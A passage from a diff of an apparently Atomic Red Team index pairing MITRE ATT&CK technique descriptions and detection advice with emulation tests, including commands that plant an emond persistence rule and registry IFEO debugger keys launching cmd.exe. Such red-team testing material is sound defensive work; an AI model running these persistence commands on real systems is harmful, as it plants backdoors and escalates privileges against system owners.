PERSISTS ON MACOS. + Retrieved September 10, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Emond + description: |- + Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. + + The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) + + Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. + id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:37:25.307Z' + created: '2020-01-24T15:15:13.426Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Monitor emond rules creation by checking for files created + or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Ivan Sinyakov + x_mitre_platforms: + - macOS + identifier: T1546.014 + atomic_tests: + - name: Persistance with Event Monitor - emond + auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 + description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) + daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + +' + supported_platforms: + - macos + input_arguments: + plist: + description: Path to attacker emond plist file + type: path + default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist + executor: + command: | + sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist + sudo touch /private/var/db/emondClients/T1546.014 + cleanup_command: | + sudo rm /etc/emond.d/rules/T1546.014_emond.plist + sudo rm /private/var/db/emondClients/T1546.014 + name: sh + elevation_required: true + T1546: + technique: + id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db + description: "Adversaries may establish persistence and/or elevate privileges + using system mechanisms that trigger execution based on specific events. Various + operating systems have means to monitor and subscribe to events such as logons + or other user activity such as running specific applications/binaries. \n\nAdversaries + may abuse these mechanisms as a means of maintaining persistent access to + a victim via repeatedly executing malicious code. After gaining access to + a victim system, adversaries may create/modify event triggers to point to + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia + malware)\n\nSince the execution can be proxied by an account with higher permissions, + such as SYSTEM or service accounts, an adversary may be able to abuse these + triggered execution mechanisms to escalate their privileges. " + name: Event Triggered Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546 + url: https://attack.mitre.org/techniques/T1546 + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux + Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. + source_name: amnesia malware + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.610Z' + created: '2020-01-22T21:04:23.285Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + - 'WMI: WMI Creation' + - 'File: File Metadata' + - 'Module: Module Load' + x_mitre_detection: "Monitoring for additions or modifications of mechanisms + that could be used to trigger event-based execution, especially the addition + of abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network. Also look for changes that do + not line up with updates, patches, or other planned administrative activity. + \n\nThese mechanisms may vary by OS, but are typically stored in central repositories + that store configuration information such as the Windows Registry, Common + Information Model (CIM), and/or specific named files, the last of which can + be hashed and compared to known good values. \n\nMonitor for processes, API/System + calls, and other common ways of manipulating these event repositories. \n\nTools + such as Sysinternals Autoruns can be used to detect changes to execution triggers + that could be attempts at persistence. Also look for abnormal process call + trees for execution of other commands that could relate to Discovery actions + or other techniques. \n\nMonitor DLL loads by processes, specifically looking + for DLLs that are not recognized or not normally loaded into a process. Look + for abnormal process behavior that may be due to a process loading a malicious + DLL. Data and events should not be viewed in isolation, but as part of a chain + of behavior that could lead to other activities, such as making network connections + for Command and Control, learning details about the environment through Discovery, + and conducting Lateral Movement. " + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + atomic_tests: [] + T1098.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.002 + url: https://attack.mitre.org/techniques/T1098/002 + - source_name: Microsoft - Add-MailboxPermission + url: https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps + description: Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September + 13, 2019. + - url: https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf + description: Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. + source_name: FireEye APT35 2018 + - source_name: Crowdstrike Hiding in Plain Sight 2018 + url: https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ + description: 'Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the + Office 365 Activities API to Investigate Business Email Compromises. Retrieved + January 19, 2020.' + - source_name: Bienstock, D. - Defending O365 - 2019 + url: https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 + description: 'Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending + O365. Retrieved September 13, 2019.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exchange Email Delegate Permissions + description: |- + Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) + + This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) + id: attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-05-04T19:18:36.254Z' + created: '2020-01-19T16:54:28.516Z' + x_mitre_contributors: + - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts. + + A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring. + x_mitre_data_sources: + - 'Group: Group Modification' + - 'User Account: User Account Modification' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1574.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.005 + url: https://attack.mitre.org/techniques/T1574/005 + - source_name: mozilla_sec_adv_2012 + url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ + description: Robert Kugler. (2012, November 20). Mozilla Foundation Security + Advisory 2012-98. Retrieved March 10, 2017. + - source_name: Executable Installers are Vulnerable + url: https://seclists.org/fulldisclosure/2015/Dec/34 + description: 'Stefan Kanthak. (2015, December 8). Executable installers are + vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation + of privilege. Retrieved December 4, 2014.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Executable Installer File Permissions Weakness + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-26T19:20:23.030Z' + created: '2020-03-13T11:12:18.558Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - Administrator + - User + - SYSTEM + x_mitre_detection: |- + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1133: + technique: + id: attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: External Remote Services + description: |- + Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. + + Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. + + Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware) + external_references: + - source_name: mitre-attack + external_id: T1133 + url: https://attack.mitre.org/techniques/T1133 + - external_id: CAPEC-555 + source_name: capec + url: https://capec.mitre.org/data/definitions/555.html + - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ + description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco + Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' + source_name: Volexity Virtual Private Keylogging + - source_name: Trend Micro Exposed Docker Server + url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html + description: Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants + Target Exposed Docker Servers. Retrieved April 5, 2021. + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-22T20:22:02.443Z' + created: '2017-05-31T21:31:44.421Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - Linux + - Containers + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours. + + When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application. + x_mitre_data_sources: + - 'Application Log: Application Log Content' + - 'Logon Session: Logon Session Metadata' + - 'Network Traffic: Network Traffic Flow' + x_mitre_contributors: + - ExtraHop + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Rory McCune, Aqua Security + - Yuval Avrahami, Palo Alto Networks + - Jay Chen, Palo Alto Networks + - Brad Geesaman, @bradgeesaman + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee + - Daniel Oakley + - Travis Smith, Tripwire + x_mitre_version: '2.2' + identifier: T1133 + atomic_tests: + - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, + please see "T1133\src\list of vpn extension.txt" to view complete list + +' + supported_platforms: + - windows + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + +' + dependency_executor_name: powershell + dependencies: + - description: 'Chrome must be installed + +' + prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") + -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) + {exit 0} else {exit 1} + get_prereq_command: "Invoke-WebRequest -OutFile $env:temp\\ChromeStandaloneSetup64.exe + #{chrome_url}\nStart-Process $env:temp\\ChromeStandaloneSetup64.exe /S \n" + executor: + name: powershell + elevation_required: true + command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start chrome + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} + T1574: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574 + url: https://attack.mitre.org/techniques/T1574 + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hijack Execution Flow + description: |- + Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. + + There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. + id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:20.290Z' + created: '2020-03-12T20:38:12.465Z' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_detection: |- + Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. + + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Monitor for changes to environment variables, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1062: + technique: + id: attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hypervisor + description: |- + **This technique has been deprecated and should no longer be used.** + + A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption. + external_references: + - source_name: mitre-attack + external_id: T1062 + url: https://attack.mitre.org/techniques/T1062 + - external_id: CAPEC-552 + source_name: capec + url: https://capec.mitre.org/data/definitions/552.html + - url: https://en.wikipedia.org/wiki/Hypervisor + description: Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016. + source_name: Wikipedia Hypervisor + - url: http://en.wikipedia.org/wiki/Xen + description: Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014. + source_name: Wikipedia Xen + - url: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf + description: Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted + Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014. + source_name: Myers 2007 + - url: http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html + description: virtualization.info. (Interviewer) & Liguori, A. (Interviewee). + (2006, August 11). Debunking Blue Pill myth [Interview transcript]. + Retrieved November 13, 2014. + source_name: virtualization.info 2006 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-30T13:44:04.712Z' + created: '2017-05-31T21:30:50.958Z' + x_mitre_deprecated: true + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: 'Type-1 hypervisors may be detected by performing timing + analysis. Hypervisors emulate certain CPU instructions that would normally + be executed by the hardware. If an instruction takes orders of magnitude longer + to execute than normal on a system that should not contain a hypervisor, one + may be present. (Citation: virtualization.info 2006)' + x_mitre_version: '2.0' + atomic_tests: [] + T1546.012: + technique: + created: '2020-01-24T15:05:58.384Z' + modified: '2020-11-10T18:29:31.112Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) + + Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. + + Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) + name: Image File Execution Options Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.012 + url: https://attack.mitre.org/techniques/T1546/012 + - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ + description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). + Retrieved December 18, 2017. + source_name: Microsoft Dev Blog IFEO Mar 2010 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview + description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December + 18, 2017. + source_name: Microsoft GFlags Mar 2017 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit + description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent + Process Exit. Retrieved June 27, 2018. + source_name: Microsoft Silent Process Exit NOV 2017 + - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image + File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. + source_name: Oddvar Moe IFEO APR 2018 + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. + source_name: Tilbury 2014 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml + description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. + Retrieved December 18, 2017. + source_name: FSecure Hupigon + - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 + description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December + 18, 2017. + source_name: Symantec Ushedix June 2008 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1546.012 + atomic_tests: + - name: IFEO Add Debugger + auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\calc.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" + +' + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger + /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: IFEO Global Flags + auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\notepad.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: | + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows 